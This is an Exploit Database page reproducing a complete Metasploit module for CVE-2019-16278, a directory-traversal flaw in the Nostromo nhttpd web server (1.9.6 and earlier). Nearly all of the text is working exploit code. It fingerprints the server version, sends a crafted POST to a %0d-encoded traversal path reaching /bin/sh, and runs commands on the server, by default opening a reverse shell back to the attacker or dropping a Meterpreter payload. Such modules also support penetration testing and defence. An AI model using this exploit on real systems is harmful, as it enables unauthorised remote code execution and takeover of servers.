Nostromo – Directory Traversal Remote Command Execution (Metasploit)

• Exploit Database
• 111 阅读

• 作者： Metasploit
  日期： 2019-11-01
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/47573/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135

  ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking   include Msf::Exploit::CmdStager include Msf::Exploit::Remote::HttpClient   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;Nostromo Directory Traversal Remote Command Execution&apos;, &apos;Description&apos;=> %q{ This module exploits a remote command execution vulnerability in Nostromo <= 1.9.6. This issue is caused by a directory traversal in the function <code>http_verify</code> in nostromo nhttpd allowing an attacker to achieve remote code execution via a crafted HTTP request. }, &apos;Author&apos; => [ &apos;Quentin Kaiser <kaiserquentin[at]gmail.com>&apos;, # metasploit module &apos;sp0re&apos;, # original public exploit ], &apos;License&apos;=> MSF_LICENSE, &apos;References&apos; => [ [ &apos;CVE&apos;, &apos;2019-16278&apos;], [ &apos;URL&apos;, &apos;https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html&apos;], ], &apos;Platform&apos;=> [&apos;linux&apos;, &apos;unix&apos;], # OpenBSD, FreeBSD, NetBSD, and Linux &apos;Arch&apos;=> [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_ARMLE, ARCH_AARCH64], &apos;Targets&apos;=> [ [&apos;Automatic (Unix In-Memory)&apos;, { &apos;Platform&apos; => &apos;unix&apos;, &apos;Arch&apos;=> ARCH_CMD, &apos;Type&apos;=> :unix_memory, &apos;DefaultOptions&apos;=> {&apos;PAYLOAD&apos; => &apos;cmd/unix/reverse_perl&apos;} } ], [&apos;Automatic (Linux Dropper)&apos;, { &apos;Platform&apos; => &apos;linux&apos;, &apos;Arch&apos;=> [ARCH_X86, ARCH_X64, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_ARMLE, ARCH_AARCH64], &apos;Type&apos;=> :linux_dropper, &apos;DefaultOptions&apos;=> {&apos;PAYLOAD&apos; => &apos;linux/x64/meterpreter/reverse_tcp&apos;} } ] ], &apos;DisclosureDate&apos; => &apos;Oct 20 2019&apos;, &apos;DefaultTarget&apos; => 0, &apos;Notes&apos; => { &apos;Stability&apos; => [CRASH_SAFE], &apos;Reliability&apos; => [REPEATABLE_SESSION], &apos;SideEffects&apos; => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ))   register_advanced_options([ OptBool.new(&apos;ForceExploit&apos;, [false, &apos;Override check result&apos;, false]) ]) end   def check res = send_request_cgi({ &apos;method&apos; => &apos;GET&apos;, &apos;uri&apos;=> normalize_uri(target_uri.path), } )   unless res vprint_error("Connection failed") return CheckCode::Unknown end   if res.code == 200 and res.headers[&apos;Server&apos;] =~ /nostromo [\d.]{5}/ /nostromo (?<version>[\d.]{5})/ =~ res.headers[&apos;Server&apos;] if Gem::Version.new(version) <= Gem::Version.new(&apos;1.9.6&apos;) return CheckCode::Appears end end   return CheckCode::Safe end   def execute_command(cmd, opts = {}) send_request_cgi({ &apos;method&apos;=> &apos;POST&apos;, &apos;uri&apos; => normalize_uri(target_uri.path, &apos;/.%0d./.%0d./.%0d./.%0d./bin/sh&apos;), &apos;headers&apos; => {&apos;Content-Length:&apos; => &apos;1&apos;}, &apos;data&apos;=> "echo\necho\n#{cmd} 2>&1" } ) end   def exploit # These CheckCodes are allowed to pass automatically checkcodes = [ CheckCode::Appears, CheckCode::Vulnerable ]   unless checkcodes.include?(check) || datastore[&apos;ForceExploit&apos;] fail_with(Failure::NotVulnerable, &apos;Set ForceExploit to override&apos;) end   print_status("Configuring #{target.name} target")   case target[&apos;Type&apos;] when :unix_memory print_status("Sending #{datastore[&apos;PAYLOAD&apos;]} command payload") vprint_status("Generated command payload: #{payload.encoded}")   res = execute_command(payload.encoded)   if res && datastore[&apos;PAYLOAD&apos;] == &apos;cmd/unix/generic&apos; print_warning(&apos;Dumping command output in full response body&apos;)   if res.body.empty? print_error(&apos;Empty response body, no command output&apos;) return end   print_line(res.body) end when :linux_dropper print_status("Sending #{datastore[&apos;PAYLOAD&apos;]} command stager") execute_cmdstager end end end